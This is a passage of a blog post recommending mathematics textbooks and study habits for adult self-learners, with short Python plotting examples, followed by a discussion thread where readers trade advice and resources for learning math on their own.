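    R = np.array([[np.cos(theta), -np.sin(theta)],
                  [np.sin(theta),  np.cos(theta)]])
    points = np.array([[1.0, 0.0], [0.0, 1.0], [1.0, 1.0]]).T  # columns are points
    print(R @ points)  # each column is the corresponding rotated point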

A brief interlude to talk about study, exercises, and taming the completionist inside you

Ok, let me take a moment to share some hard-won advice. When it comes to solving exercises as you work through these books, the completionist mindset will destroy you. When I first set out on my adventure, I would refuse to move forward in a book until I had solved every problem. This worked up to a point...and that point was when I met Spivak and had to finally concede defeat.

It's hard to put a formal rule on how long you should spend on any given exercise before 'giving up' and looking at the solution. I would say a lower bound should be maybe 20 minutes or so. But the upper bound? I don't know. For some problems, it can be fruitful and productive to spend days (weeks even?) thinking about them provided you're making some kind of incremental progress or still have tricks in your bag you want to apply.

For me personally, I spend around 10 hours most weeks doing math and I've had brief bursts where I've done as much as 30hrs/week when I'm between contracts, etc. What that does mean though is that one hard exercise can completely block your progress for weeks if you let it, and I'll say right now, when that does happen, it can be quite demoralizing.

Ultimately, my advice is to let your intuition and energy levels guide you - do you have the energy to chase this really hard problem down or are you in the mood for just learning the answer now? If you just want the answer now so you can move forward, look it up! There's no penalties here. You didn't lose.

I know it feels unnatural to not set hard rules around how long you should spend on a given problem, but remember that ultimately you're optimizing for your enjoyment (that's why you're doing this, right?) and long term consistency.

You will do yourself a disservice (in maths, and in life) if you burn out hot and fast.

Multivariable Calculus

MIT OCW Multivariable Calculus

The MIT OCW Multivariable Calculus course is the best resource I've found for getting comfortable with multivariable calculus. I don't really know of any good books covering this subject (no, please don't say Stewart) and I found the MIT course to be really enjoyable. Good collection of problems and worked solutions, clear material and lectures. And if I'm honest, as a self-learner who went to a good but not great university, there is also something quite satisfying about 'sitting' an exam from MIT in the same conditions as an MIT student would experience and completely acing the exam.

Differential Equations

Ordinary Differential Equations (Dover) - Tenenbaum and Pollard

ODEs get a bit of a bad rap for being a quite boring subject, and I think many people view the process of learning about differential equations as being about internalizing an almost random collection of 'tricks' to solve certain ODE forms. But it doesn't have to be that way, and I learned that from working through this book. While this book leans heavily into the applied/computational side of mathematics, it also does a great job complementing the examples and exercises with theory. It does feel a bit dated at times (it was written in 1985) and could probably benefit in certain places with some visual aids, but if you're comfortable with Python and plotting/graphical libraries you can make it up yourself as you go along. Overall, the book moves along at a fairly gentle pace - you're unlikely to get stuck as you work through the book as long as you're diligent, all the exercises have solutions, and being a Dover book, it's really cheap!
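
As a sketch of the kind of visual aid I mean (my own example, not from the book), a few lines of Python with numpy and matplotlib will draw the direction field of y' = y with one solution curve overlaid:

    import numpy as np
    import matplotlib.pyplot as plt

    # Direction field for y' = y: at each grid point, draw a unit arrow of slope y.
    t, y = np.meshgrid(np.linspace(-2, 2, 20), np.linspace(-2, 2, 20))
    dt, dy = np.ones_like(t), y
    length = np.hypot(dt, dy)
    plt.quiver(t, y, dt / length, dy / length, angles='xy')
    ts = np.linspace(-2, np.log(2), 100)
    plt.plot(ts, np.exp(ts), 'r')  # the particular solution y = e^t through (0, 1)
    plt.xlabel('t'); plt.ylabel('y')
    plt.show()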

Analysis

Principles of Mathematical Analysis - Rudin

Rudin's Principles of Mathematical Analysis, also affectionately known as Baby Rudin, is a difficult, serious book, but if you made your way through Spivak and all the books I've shared so far, you've got all the tools you need to make it through this. Occasionally you'll see this recommended as the first book people should learn analysis from, but I think that's a big mistake for us self-learners: it's dry, contains little in the way of motivation/exposition, and has quite a few 'fill in the blanks' moments.

Note that although this book does not have any official solutions, there is a reddit community that has been working through the book, crowd-sourcing and documenting solutions. The community is at https://www.reddit.com/r/babyrudin/ and the crowd-sourced solutions document can be found here.

Algebra

A Book of Abstract Algebra (Dover) - Pinter

I'm really excited to recommend Pinter's A Book of Abstract Algebra and the truth is if the subject of Abstract Algebra is of real interest to you, this is the kind of book you can pick up and work through very early on - as early as after finishing your first book of proofs (and if you're clever, even before that). The chapters are quite short, with each chapter accompanied by a pretty hefty set of exercises which expand on the content. The book covers all the usual suspects: groups, rings, etc. and ultimately builds its way up to Galois Theory. One important thing to note is the book only contains solutions to selected exercises but the exercises are not too hard, so this shouldn't be too much of a problem.

One funny sidenote: I've heard it said on many occasions that mathematicians typically fall into one of two camps: those who like algebra (algebraists), and those who like analysis (analysts). It's even been observed that analysts tend to eat corn in spirals, while algebraists in rows. After now getting your first taste of algebra, which camp do you think you're in and does the corn theory hold true?

Abstract Algebra - Dummit and Foote

While Pinter's A Book of Abstract Algebra is excellent, it only covers a small sliver of topics from the field of abstract algebra. By contrast, Abstract Algebra is massive, and covers a lot of ground. You could almost affectionately call it a reference, but at the same time it also has a lot of those same qualities that make it excellent for self-study - lots of examples and exercises, good motivation and descriptions, etc. Just a note though that it does not come with solutions to the exercises, but given its popularity, it's quite easy to find them online.

To reiterate, this is a big book and I haven't myself worked my way through it entirely, but rather just picked it up now and then and absorbed small bits and pieces at a time...in many ways treating it like a reference instead of something to work through from start to finish.

If you can, buy the hardcover. Books this big don't fare as well in paperback.

Topology

Topology - Munkres

Focusing on point set Topology, Munkres' Topology is widely considered to be one of the best introductory books in the field. Topology is a quite difficult subject to grasp and it took me several attempts to get going - I admit to feeling much like Hitler in Hitler learns topology for a very long time until finally things started to click. Part 2 of the book contains a nice introduction to algebraic topology but I'll admit now at the time I got to this material I was already struggling a bit and have never revisited the material.

Introduction to Topology (Dover) - Mendelson

This was the book that really helped me get Topology. If you're finding Munkres a bit difficult to get going, this book is both cheaper and has a bit more exposition - there's a lot more hand-holding and the book takes its time to help you build up the intuition for why things work. In my opinion, this is the better book of the two for self-learners.

Number Theory

Elementary Number Theory - Jones

Elementary Number Theory is a great book for anyone who wants to jump in to number theory first and may have skipped some of the previously mentioned books on algebra, as it assumes very little prior knowledge. This was certainly the case for me, where I worked through this book shortly after my first proofs book. In terms of difficulty, it was perfect for me at the time, but on reflection now it might be too easy for some. If that's the case, take a look at An Introduction to the Theory of Numbers which I think would be the next best step up in difficulty and maturity.

Number Theory (Dover) - Andrews

George Andrews is one of the leading experts in the field of partitions and this book provides an excellent first introduction to the field along with a good selection of other topics (with a combinatorial focus). It's quite a short book, but manages to pack a lot in and has a great selection of exercises (with solutions to selected exercises). If you've ever heard the 'Rogers-Ramanujan identities' and wanted to learn more, this book is the perfect study companion.

Probability

Introduction to Probability, Statistics, and Random Processes - Pishro-Nik

While focusing more on the applied side of probability and statistics (this book doesn't go anywhere near measure theory), this book ended up being a really pleasant surprise for me in a field that I wasn't particularly interested in and have always found a bit dry. It also doesn't really assume much in the way of prior knowledge except for a little multivariable calculus and linear algebra, making it very approachable. I think engineers working in the fields of machine learning and data science in particular would really benefit from working through this book.

Other

What follows is a collection of books and resources I also highly recommend, but somewhat off the beaten path and chosen by me more for personal interest.

What Is Mathematics? - Courant and Robbins

What Is Mathematics is a classic and it's one that I thoroughly enjoyed reading...eventually. Why eventually? While it's claimed to be an 'elementary' book for the 'beginner', in truth, if you gave this book to any but the most gifted high-school graduate it would absolutely crush them within the first ~20 pages. And such was the case with me, where I picked this book up and tried to work through it very early on in my learning journey. Unless you're brilliant (and I surely am not), I really would recommend only tackling this book after working through a proofs book and some of the foundation books I recommended earlier. The book itself is quite broad in the subject matter it covers - number theory, geometric constructions, projective geometry, topology, and finally on to calculus. It's actually a really playful and fun book and manages really well to avoid getting bogged down too much in any one area. I highly recommend it...just make sure you don't start it before you're ready.

Naive Set Theory (Dover) - Halmos

Naive Set Theory gets right to the heart of the set-theoretic underpinnings of mathematics and does it extremely well. It is an extremely readable book, and in my opinion Halmos was one of the best mathematical expositors ever (interesting aside: Halmos invented the 'iff' notation for that wonderful phrase 'if and only if' and also the ∎ notation to signify the end of a proof!). It contains only a small handful of exercises. This book was my first exposure to proper set theory and I really enjoyed it.

The Cauchy-Schwarz Master Class - Steele

You can almost think of The Cauchy-Schwarz Master Class as an exercises/problem solving book for inequalities...as I worked through it I couldn't help but think this book would basically be the perfect bootcamp for dealing with tricky inequalities in a competitive math setting. It's got that quality of books like Polya's How to Solve It and others in that it's always prodding you to think creatively and work the problems. And working through it, you also come to appreciate just how damn versatile the Cauchy-Schwarz inequality is!
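
For reference, here is the inequality itself in LaTeX, in its inner-product form (equality holds exactly when u and v are linearly dependent):

    % Cauchy-Schwarz for vectors u, v in an inner product space
    \[
      |\langle u, v \rangle| \le \|u\| \, \|v\|
    \]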

Prime Numbers and the Riemann Hypothesis - Mazur and Stein

I'm currently reading this book right now!

Connecting with the broader math community

At least for me, studying mathematics has been a fairly isolated experience and I've never really found a good community to participate in. There are a couple of communities I'm aware of though, and of these, /r/math and the AoPS Community seem to be the most active. There's also the Math StackExchange, which is very active, but I find it hard to classify that as a community.

I also really like Grant Sanderson's 3Blue1Brown YouTube Channel - he has a lot of excellent general interest math videos with just the right amount of rigor.

Incidentally, if you're interested in talking math with someone, I'd love to hear from you and probably the best place to connect with me is on Twitter: @neilwithdata

What's next

There are a couple of books I've heard great things about that I'm really interested in reading next. They are (in no specific order):

Mathematics: Its Content, Methods and Meaning - I actually own the Kindle edition of this but as with many math books, it has not been converted to digital format well. I'm really looking forward to picking up the print copy and having a go at this.

Visual Complex Analysis - Some chapters in the TOC look quite familiar to me, and others I have no idea about...which is quite exciting!

Introductory Functional Analysis with Applications - I've heard this is one of the best introductory books for functional analysis.

Some parting advice

I'm currently 35 years old, and while studying mathematics I've had two wonderful kids and co-founded a startup (and I've also just started a new small business building Slack and Microsoft Teams apps and integrations). Suffice it to say, life has been busy. So I wanted to offer some more general advice for anyone who wants to study math while staying sane. Here is what has helped me:

  • Exercise. It turns out that you're not just a brain in a tank and the mind-body connection has an immense impact on your daily happiness and well-being. Exercise every day.

  • Take regular breaks and go for walks. Seemingly intractable problems have a surprising way of becoming tractable after a long walk. Sunshine also has a wonderful effect on improving your overall mood and helping you sleep better.

  • Alternate between easier and harder content. One way you're sure to burn out is if you are always pushing, without periods of rest. Make sure you follow up hard books with easier, almost routine, books. Sometimes it can even be beneficial to work on two books at once - one easy, one hard. Make sure to pepper in little easy wins everywhere in between the big meaty hard problems. Always follow up 'failure' (i.e. this problem is too hard, I give up) with 'success'.

  • Spend time with friends and family. Self-studying maths can be a bit isolating, but ultimately we're wired to be social creatures. Don't neglect your friends and family. Invest in good relationships with people you love to be around.




All Comments: [-] | anchor

dr_dshiv(4049) 1 day ago [-]

Does anyone know a good historical approach to maths? Like, start with Pythagoras?

Even something purely in the modern era, learning about Fourier and Wiener, harmonic analysis, etc.

dr_dshiv(4049) 1 day ago [-]

The best historical treatment I've yet found is the Time-Life book on mathematics. https://www.amazon.com/Mathematics-David-Bergamini/dp/B0007G...

I know that Freeman Dyson attributes his proficiency in math to his love of the subject, which he claims was kindled as a teenager by reading Bell's 'Men of Mathematics'.

leto_ii(10000) 1 day ago [-]

Does anybody have any experience with How to Prove It by Velleman? Recently I was thinking of starting on it, but I'm not sure about the level of commitment necessary.

manu_ss(10000) 1 day ago [-]

It seems to have some introduction to logic and math language; if you have never read any math books like the ones referred to in this post, that book should be a nice way to ease into it.

strls(4292) about 23 hours ago [-]

I worked through this book to learn how to do proofs. It turned out to be way more fun than I expected, and it really did demystify proofs for me. It took several months of studying - there are many exercises - but it was completely worth it. I'm glad I read this book before studying group theory and real analysis.

dorchadas(4314) 1 day ago [-]

I think it's great that people are posting book links like this; however, what I've found most helpful is actually having someone to help guide you.

I realize how lucky I was to find a Discord server run by a math PhD graduate who is willing to help guide our learning. From this, I've started learning Algebra and Analysis (just starting with the latter). It's nice to have someone to discuss problems with when you get stuck and to guide you. Likewise, he can suggest exactly which problems I should do for a given chapter, so that I don't spend my time doing ones that just repeat the same simple things over and over and can focus on nice, conceptual ones. So, if you can, please try to find someone to help guide you, or be that guide for someone else! Having it has made me seriously consider going back for a mathematics masters (and maybe PhD), switching from my physics background.

nubb(10000) 1 day ago [-]

Could you share the discord server? Thank you.

mathgenius(352) 1 day ago [-]

I would say that learning mathematics is virtually impossible without a teacher. Like, would you try learning Karate without a teacher? How about if you get with a bunch of friends and you all try to learn it together? No way.

Even the professionals try to find someone to learn a new concept from. There's something about mathematical writing that is too fragile/brittle for wetware.

One other strategy: I've noticed the really smart (arrogant?) people just don't bother reading new mathematics; they re-invent it themselves. It's actually worth trying if you can stomach it.

wyqydsyq(10000) 1 day ago [-]

As someone who dropped out of high school after 10th grade and never went to university/college, one great way I've found for learning mathematics without any foundational basis is trying to learn CG/3D programming.

I always felt like maths was too abstract to keep me engaged, but when the output of your work is immediately observable visually, it becomes a lot more engaging. There's just something so much more satisfying about being able to 'see' the results.

Plus as a self-taught programmer, I find it much easier to learn front-to-back by deciding on a desired outcome and working towards it, rather than progressively building up abstract fundamental skills that can later be combined to achieve a desired outcome (which is essentially the traditional academia path for learning STEM fields)

ducaale(1492) about 21 hours ago [-]

This is why I love to do game development without using a game engine. It gives you a reason to learn math, optimize your code down to the metal, all while having fun playing your game.

laichzeit0(10000) 1 day ago [-]

I pretty much followed the same route as the OP: re-studying mathematics seriously after 10 years in industry, having initially done a CS degree, worked mostly in software engineering, and transitioned into Data Science over the last 3 years. When I saw Book of Proof, then Spivak, then Apostol on his list I chuckled, because that's exactly the route I ended up following as well. Studying from 04:30 to 06:30 on weekdays and about 8 hours split up over the weekend, Spivak took 8 months to complete (excluding some of the appendix chapters), but if you can force yourself to truly master the exercises - and Spivak's value is the exercises - then you're close to having that weird state called "mathematical maturity", or at least an intuition as to what that means. You can forget about doing the starred exercises, unless you're gifted. Spend a lot of time on the first few chapters (again, the exercises); it will pay off later in the book. It was a very frustrating experience and I had so much self-doubt working through it; it's an absolutely brutal book. Some exercises will take you literally hours to figure out.

If you do Book of Proof first you will find Spivak much easier, since Spivak is very light on using set theoretic definitions of things. Even the way he defines a function pretty much avoids using set terminology. Book of Proof on the other hand slowly builds up everything through set theory. It was like learning assembly language, then going to a high level language (Spivak) and I could reason about what's going on "under the hood". Book of Proof is such a beautiful book, I wish I had something like it in high school, mathematics would have just made sense if I had that one book.

I read a quote somewhere - I think it was von Neumann - that said you never really understand mathematics, you just get used to it. Keep that in mind.

p1esk(2591) 1 day ago [-]

So, you've made all that effort, how does it help you in your new role as a data scientist? Is there anything you do now that requires 'mathematical maturity'? Or is it something that can be learned much quicker on as needed basis?

nsainsbury(3512) 1 day ago [-]

Heh, nice to find someone who walked a similar path! :-)

Ah Spivak...yes, I absolutely agree it's one of the best books to build up that mathematical maturity everyone talks about.

For me Spivak took about 6 months, and I managed to do almost all of the starred exercises - gifted? No. Brutally determined? Yes. And I was quite fortunate to be in a place in life where I could put serious hours into it at the time.

After that, I learned to relax a bit more as I realised I had pushed myself way too hard and was close to burning out. I still love looking back at that damn book though. There's just something that's so special about it...the way the exercises build upon each other and connect together. It's really unique.

hackernews7643(10000) 1 day ago [-]

One thing I don't think is discussed enough is the process of how self-learners in math get critical feedback. Most advanced-level math textbooks have no solutions to check your work against, nor a way to get feedback from an expert, and this is essential for learning. At least with programming, you can get immediate feedback and know whether what you did is correct or not.

yuanshan(10000) 1 day ago [-]

Usually, people will post some or almost all of the solutions online if the textbook is really famous - for instance, baby Rudin.

Although rarely, some authors do provide solutions, like Knuth's books and Stephen Abbott's Understanding Analysis.

For immediate feedback, maybe you can check out [0] to learn some formal proof by doing interactive proving.

[0] http://wwwf.imperial.ac.uk/~buzzard/xena/natural_number_game...

BTW, you can always ask questions on https://math.stackexchange.com

chobytes(10000) 1 day ago [-]

Learn proofs well and you get pretty good at knowing when you're right - enough for almost any problem you're likely to encounter in a math textbook, anyway.

clircle(3797) 1 day ago [-]

It's not immediate feedback, but you do learn when you are right and when you are wrong. You learn when you are bullshitting yourself. You learn that you need to be able to justify every step in a proof, and if you can't, then you are wrong. Trying to bullshit the right answer is the most common way to end up with a faulty proof. Of course, you can also end up with a faulty proof because you can't differentiate your own bullshit from truth, but this is less common.

dwrodri(4149) 1 day ago [-]

I recently had the experience of taking my first graduate-level probability course. It assumed quite a strong familiarity with real/complex analysis, and I suffered quite heavily. Something of note was that once I finally managed to 'peel back' the analysis, the underlying intuition made a lot of sense for the simplest cases in probability (e.g. hypothesis testing between two normal distributions is a matter of figuring out whose mean you are 'closer' to).
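
That nearest-mean intuition is easy to check numerically. A minimal Python sketch (the parameters here are invented for illustration): for two normals with equal variance and equal priors, the likelihood comparison and the "whose mean am I closer to?" rule always agree.

```python
# Sketch: deciding between N(mu0, sigma) and N(mu1, sigma) with equal priors
# reduces to a nearest-mean rule. All parameters are made-up examples.
from scipy.stats import norm

mu0, mu1, sigma = 0.0, 2.0, 1.0

def decide(x):
    # Compare the two likelihoods directly...
    lr_choice = 1 if norm.pdf(x, mu1, sigma) > norm.pdf(x, mu0, sigma) else 0
    # ...which agrees with "whose mean am I closer to?"
    nm_choice = 1 if abs(x - mu1) < abs(x - mu0) else 0
    assert lr_choice == nm_choice
    return lr_choice

print(decide(0.7))  # 0: closer to mu0
print(decide(1.4))  # 1: closer to mu1
```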

I am of the opinion that notation is a very powerful tool for thought, but the terseness of mathematical notation often hides the intuition, which is more effectively captured through good visualizations. I would really like to take a self-driven 'swing' at signal processing, this time approaching it through the lens of solving problems on time-series data, since as a programmer I believe that would be quite useful and relevant.

watwatinthewat(10000) 1 day ago [-]

In my opinion, the issue here is notation and a bit more. I did about eight years of college in math, changed paths, changed careers, changed careers again to ML/DL research, and now will finish a CS undergrad degree this month.

I put it in context because it's not quite a direct comparison since I have been in greatly different situations and ages between studying math and CS, but putting that aside, I have to say I have greatly enjoyed the computer science means of teaching more than math, doubly when it comes to self-learning. Concepts in math are generally taught entwined with the means of proving those ideas. That's important if you're a grad student looking to be a math researcher, but (IMO) it is not so great if you're a newer student or learning on your own and trying to grasp the concept and big picture. A proof of a theorem can be (and too often is) a lot of detail that really doesn't help you grasp the concept the theorem provides or is used towards, often because it involves other ideas and techniques from higher levels or just different types of math, both of which are out of the scope of the student learning the topic. Worse yet, it is standard for a proof to be written almost backwards from how it would be thought out. Anyone from a math educational background has the experience in homework of solving a problem, then rewriting it almost in total reverse to be in the proper form to submit. This means not only is the proof of the theorem not useful towards conceptual understanding, reading the proof doesn't show you chronologically how you would discover it yourself. That is a lot of overhead cost to break through to get to real understanding, real learning. As you mention, notation as well is another thing you need to break through.

I have found computer science and related classes to be taught more constructively: the concept is given first, and then your job as the student is to construct it. Coming from the ML field, I love comparing math and CS treatments of topics here. Explanations from CS people of backpropagation, for example, are always visual, and books/courses will have you construct a class and methods to do the calculations. Someone with a bit of programming knowledge can follow along in their language of choice. Math explanations get into a ton of notation from Calc 3+, and it's going to take a lot of playing around and frustration to get a working system out of the explanation. Even the derivation section on Wikipedia is not something most people will understand and be able to turn into useful output.

The more I see other ways concepts are taught, the more I wish math had been taught a different way. There is a lot to break through in order to get to real understanding, just by the way it's formed and taught.

daxfohl(4234) 1 day ago [-]

This is so difficult. I've been doing it off and on for twenty years and not made much of a dent in things.

The hardest part I think is understanding and measuring your progress. In school you've got exams and classmates to compare against, profs to talk to. Alone it's much harder. 'Do I understand this well enough?' 'Did I do the problems right?' (Especially with proof problems, how do you know you're right?). 'I can work through some problems one by one, but it feels like something fundamental I'm missing. Am I, or is this chapter really just about some tools?'

Then it's way too easy to say, well, I'm never actually going to use any of this, so why am I doing it... and take a few months off and come back having forgotten what you'd learned.

polyphonicist(10000) 1 day ago [-]

Shared a similar thought here: https://news.ycombinator.com/item?id=22401420

Yes, it is really important to learn math with study-mates. Just as we do reviews in code, in math too we need someone else who can review our proofs. It is even easier in math to make an error in a proof and believe that something is proven when it isn't. A study-mate helps prevent us from fooling ourselves.

l_t(10000) 1 day ago [-]

I've tried a few things recently that help with that:

1. Don't do exercises unless you want to. Completionism is a trap.

2. Take notes. Rewrite things in your own words. Imagine you're writing a guide for your past self.

3. Ask questions. Anytime you write something down, pause and ask yourself: Why is this true? How can we be sure? What does it imply? How could this idea be useful?

4. Cross-reference. Don't read linearly. Instead, have multiple textbooks, and 'dig deep' into concepts. If you learn about something new (say, linear combinations) -- look them up in two textbooks. Watch a video about them. Read the Wikipedia page. _Then_ write down in your notes what a linear combination is.

Anyway, everyone's different of course, but these practices have been helping me get re-invigorated with self-learning math. Hope they help someone else out there. I welcome any feedback!

(edit: formatting)

polyphonicist(10000) 1 day ago [-]

I am going to suggest something that might go against this idea of self-studying math.

Do not do it alone. I mean, it is okay to self-learn mathematics as much as possible but don't let that be the only way to learn. Find a self-study group where you can discuss what you are learning with others.

I think the social effect can be profound in learning. I realized this when I was learning calculus on my own. My progress was slow. But when I found a few other people who were also studying calculus, my knowledge and retention grew remarkably. I think the constant discussion and feedback loop helps.

With round the clock internet connectivity, it is easier to find a self-study group now than ever.

dorchadas(4314) 1 day ago [-]

Ha - I actually suggested the exact same thing before seeing your post. It's definitely much better to have a group. Since I found this group I'm currently in, I've been much more motivated, and also able to get feedback from more advanced people and pare the problem numbers down to only the ones that are useful and will help me build concepts, limiting how many 'calculation' problems I have to repeat.

dentalperson(10000) 1 day ago [-]

It's not super clear to me how this actually works in practice. I've seen there is one public math meetup in SF, but the topic is usually different from the one I want to study.

I'm glad to see there are online options for groups like Stack Exchange or tighter groups like the one integerclub mentions, but I still seem to run into the same problem. For example, I'm not sure how to get a group of people who are interested in reading book X when I want to start it. If anyone has advice on that, please share.

angry_octet(3727) 1 day ago [-]

Agree. And if one is a well-paid software engineer, one can definitely afford to pay a maths grad student for an hour a week, preferably a bit more than whatever pittance the local university pays them for being a tutor. You will progress far quicker and with fewer wrong turns. It is also far cheaper than enrolling at a university. A personal trainer for the brain.

thorn(4240) 1 day ago [-]

I am always astonished to learn that there are such self-learners in the world. I wonder how it is even possible to have a family, spend the whole day building a startup - I cannot imagine that startup work is less than 8 hours a day - and then learn math or another complicated branch of science in the evening. What time, and more especially how much energy, is left for the family? Are these guys superhumans? I was never able to sustain that level of daily energy without falling into burnout. I am not critiquing or being jealous here, just genuinely interested. How is it possible to keep this sustainable across so many years?

cammikebrown(10000) 1 day ago [-]

Not everyone is at a startup. I'm a bartender with a physics degree who's learning more math in my spare time for fun, and to eventually switch to some sort of data science career if I tire of bartending.

FranzFerdiNaN(4179) 1 day ago [-]

I have my doubts that the people who write these kinds of posts truly did everything they say. As you say, it just does not seem possible to thoroughly work through all those math books + raise multiple kids + maintain friendships + work out daily (as he claimed he did) + work full time + handle things like cleaning, shopping, and other chores.

peatfreak(10000) 1 day ago [-]

I'm pretty skeptical about these 'best of' lists of books for self-directed mathematics education.

I have my own 'best of' list that is very different to this list, although there are a couple of crossovers.

If you are fortunate enough to have access to a university library (or libraries), I would _highly_ recommend inquiring about access to their general collection. I was also fortunate enough to study mathematics through a three-year degree at a research university, so I had an excellent head start.

A HUGE part of my journey of collecting my 'perfect library' of mathematics self-tuition and reference books (and course books) was doing my own research to find the perfect titles. I started in the early days of my mathematics degree, and I used resources like Amazon, Usenet, libraries (already mentioned), and ... that was about it.

Another important question to ask yourself is the following:

'Why am I doing this?'

Life is short, and by the time you hit middle age, if you have a family or bills to look after, are you REALLY going to want to lock yourself away in your study to learn Lebesgue integration instead of focusing on the rest of your life?

What people fail to emphasise is that mathematics is a social activity, much more than many people realize.

Exercise: Find the topics of mathematics that are important to your goals but missing from the list, and find a favorite book or two that covers those topics.

Exercise: Consider whether your interest in (self-directed) mathematics is sincere enough, and your application serious enough, that you might be better off enrolling in a course. Even if it's a night course that lasts a couple of years, you will meet a LOT of people who can help in ways that are immensely more productive than trying to do this all by yourself.

I recently purchased volume 1 of my favorite calculus and analysis book. It's an incredible masterpiece. The coverage of topics is much broader and more interesting than Apostol or Spivak. The latter books are both very good, but they also have myopic, one-track pedagogical approaches and limited themes in their coverage.

Exercise: Find your own favorite introductory calculus book that is suitable for the motivated student.

laichzeit0(10000) 1 day ago [-]

> I recently purchased volume 1 of my favorite calculus and analysis book.

Which book would that be if I might ask? I'm wagering... Courant? ;)

angry_octet(3727) 1 day ago [-]

The key piece of advice is to take walks. Walking is essential for mathematics. Many times when walking with my father, he would turn for home and start walking faster, and by that sign I knew that he wanted to get home and write down a lemma.

tprice7(4204) 1 day ago [-]

I emphatically agree. There is something that walking does to your brain that really helps you see the big picture.

injb(10000) 1 day ago [-]

I'm glad you posted this, because I use walks this way too. And because it reminds me of William Rowan Hamilton and the quaternions!

gavinray(10000) 1 day ago [-]

I know this likely applies to almost nobody, but I have browsed most of the self-study math threads that pop up here as a forever-on-my-todo-list thing, and I have a remark to make:

I have yet to find a guide that does not start with the assumption that you graduated high school.

That is a very reasonable assumption to make. We are in a community of technology and engineering; it would be a bit ridiculous to assume the people around you did not have a fundamental base of mathematics.

But the times I have tried to go through these teach-yourself materials, it went from zero to draw-the-rest-of-the-fucking-owl real quick. [0]

I have been programming for 14 years, but stopped doing schoolwork around age 12, and never did any math beyond pre-algebra.

Does anyone know of materials for adults that cover pre-algebra -> algebra -> geometry -> trigonometry -> linear algebra -> statistics -> calculus? At a reasonably quick pace that someone with a family + overtime startup hours could still benefit from?

[0] https://i.imgur.com/RadSf.jpg

(Also, curse the Greeks for not using more idiomatic variables. ∑ would never pass code review, what an entirely unreadable identifier)
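
For what it's worth, ∑ usually unpacks into a very ordinary loop. A rough Python translation of ∑ from i = 1 to n of i² (my own example, not from the comment above):

```python
# The summation sign is just a for loop: here, the sum of i^2 for i = 1..n.
n = 10

total = 0
for i in range(1, n + 1):
    total += i * i

# Or, more idiomatically:
total = sum(i * i for i in range(1, n + 1))
print(total)  # 385
```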

mathattack(481) 1 day ago [-]

Khan Academy is great as they start from the very beginning. If you're a good problem solver you can skip most of the videos. If you learn by videos, they're very helpful.

dhimes(2827) 1 day ago [-]

I hope I'm not too late here, but if you are in the US I would highly, highly recommend signing up for developmental classes at your local community college. You are exactly whom those classes are for. If you've tried on your own before and struggled to stay motivated, doing it in a structured way, in 15-week 'sprints', may be just the kickstart your self-study program needs.

Disclaimer: I was a full-time community college professor for a decade. I had no idea what a resource they were. It's small money compared to either the alternative of a university or not succeeding. If you use them you will succeed. It's what they do, and they've been doing it for a very long time.

raidicy(10000) 1 day ago [-]

I'm in a similar situation. I'm having to learn linear algebra, calc, and basic probability, and brush up on all of my holes in between. I haven't found a direct path, however. What has helped me is this deep learning book[0], which has spelled out very plainly what I need to learn. From there I use a combination of Math is Fun[1], BetterExplained[2], and 3Blue1Brown[3]. Math is Fun really helps by just giving you examples and definitions strictly based on the subject, instead of assuming knowledge in another category. BetterExplained helps with intuition. And 3Blue1Brown was second to none for really painting a picture of linear algebra and calc. Even though I've had to watch the videos 3-4 times each to get it, I'm extremely happy with what I've grokked. One last resource is Eddie Woo[4] - super clear and enthusiastic, intuitive lessons from him teaching high school and slightly-beyond math.

Good luck in your journey. I know how frustrating it is to not be able to find the math resources you need at an awkward level. If you happen across even better resources please share.

Also, a tip that has really been helping me: when you 'read' a math equation, don't simply recite the variable names and numbers. Try to say out loud what they represent. I've found that if I can't, then I don't really understand the concept I'm working with.

[0] https://d2l.ai/chapter_preliminaries/index.html
[1] https://www.mathsisfun.com/
[2] https://betterexplained.com/
[3] https://www.youtube.com/channel/UCYO_jab_esuFRV4b17AJtAw
[4] https://www.youtube.com/user/misterwootube/playlists?view=50...

OJFord(2780) 1 day ago [-]

> (Also, curse the Greeks for not using more idiomatic variables. ∑ would never pass code review, what an entirely unreadable identifier)

S for Sum, T for Total, N for Number, I for Index, etc. might though.

photon_lines(3982) 1 day ago [-]

I'm actually self-studying as well, and I try to compile everything I learn and the notes that I take into 'Intuitive Guides', which I'm going to make available in my GitHub repository. I actually have a guide on Linear Algebra, which you can find here:

https://github.com/photonlines/Intuitive-Overview-of-Linear-...

I'm going to release one on Maxwell's equations next week, and I've started working on Calculus and General Relativity guides as well, so hopefully it helps!

puritanicdev(10000) 1 day ago [-]

I'm in the same boat, and as ridiculous as it sounds, I've been in programming (self-taught) for 10 years now without especially good knowledge of math. I slacked off in math classes in high school, despite the fact that I loved math and was really good once I sat down to listen, practice, and understand the material. I'm also painfully aware of the fact that my math is really bad and that I'm missing out on utilizing it in my job, so I've decided to practice at least one hour a day on Khan Academy and eventually enroll in a comp-sci program at university this year.

rustybolt(10000) 1 day ago [-]

Consider getting a private maths teacher. At this level it's probably not very expensive but you'll be able to learn so much more efficiently.

FigmentEngine(10000) 1 day ago [-]

> Also, curse the Greeks for not using more idiomatic variables. ∑ would never pass code review, what an entirely unreadable identifier)

I guess it's idiomatic if you know 'Greek'... ∑ is sigma, the Greek letter S, so Summation. And Π is pi, for Product.

qwrshr(10000) 1 day ago [-]

The Art of Problem Solving series.

DecayingOrganic(3883) 1 day ago [-]

I'd highly recommend the OpenStax math textbooks: they are completely free, openly licensed, peer reviewed, and published by Rice University. They also start from pre-algebra.

https://openstax.org/subjects/math

c3534l(4215) 1 day ago [-]

Khan Academy. Start with Khan Academy.

goto11(10000) 1 day ago [-]

I went to the local library and borrowed high-school level textbooks. Just start from the level where you absolutely understand everything, however low you need to go. Solve all the exercises. You will blaze through the easy stuff, but the exercises will make it clear to you when you need to begin paying attention.

peterhj(10000) 1 day ago [-]

I first learned about calculus from, I think, this book, 'Calculus the Easy Way' [1] (or, at least the first chapter or two). It does make use of some algebra, but you're not necessarily limited to the strict progression of pre-algebra -> algebra -> calculus.

[1] (amazon: https://www.amazon.com/Calculus-Easy-Way-Douglas-Downing/dp/...)

sriram_malhar(10000) 1 day ago [-]

Just the book for you:

'Who is Fourier: a mathematical adventure' https://www.amazon.com/Who-Fourier-Mathematical-Transnationa...

It is a simply brilliant book that takes you from basic trigonometry, logarithms, and so on through calculus and finally Fourier series.

br_hue(10000) 1 day ago [-]

It's nice to see that I'm not alone in this situation.

I completely ignored math during high school due to a number of reasons (bad influences, even worse teachers...). I then went to college and managed to pass through calculus classes, mostly thanks to pure mechanical memorization and professors turning a blind eye to my lack of understanding.

